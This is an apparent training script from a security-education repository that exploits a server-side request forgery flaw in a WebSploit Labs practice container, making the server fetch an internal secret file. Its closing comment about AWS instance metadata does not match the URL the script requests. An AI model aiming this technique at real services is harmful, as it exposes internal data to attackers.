h4cker/web_application_testing/ssrf_galatic_archives.py

25 lines
830 B
Python
Raw Normal View History

2023-07-04 03:07:21 +00:00
'''
Script to exploit the SSRF in the WebSploit Labs Galatic Archives container.
Author: Omar Santos @santosomar
'''
import requests
# The URL of the vulnerable web service.
2023-07-04 03:11:33 +00:00
vulnerable_url = 'http://10.6.6.20:5000'
2023-07-04 03:07:21 +00:00
# The internal URL that the attacker wants to access.
2023-07-04 03:11:33 +00:00
# This is to simulate that this data (secret.txt) should be inaccessible from attacker's network.
2023-07-04 03:07:21 +00:00
internal_url = 'https://internal.secretcorp.org/secret.txt'
# The attacker constructs the exploit URL by appending the internal URL
# as a query parameter to the vulnerable service's URL.
exploit_url = vulnerable_url + '?url=' + internal_url
# The attacker sends a request to the exploit URL.
response = requests.get(exploit_url)
# If the vulnerable server is running inside an AWS EC2 instance, it
# will return the instance metadata.
print(response.text)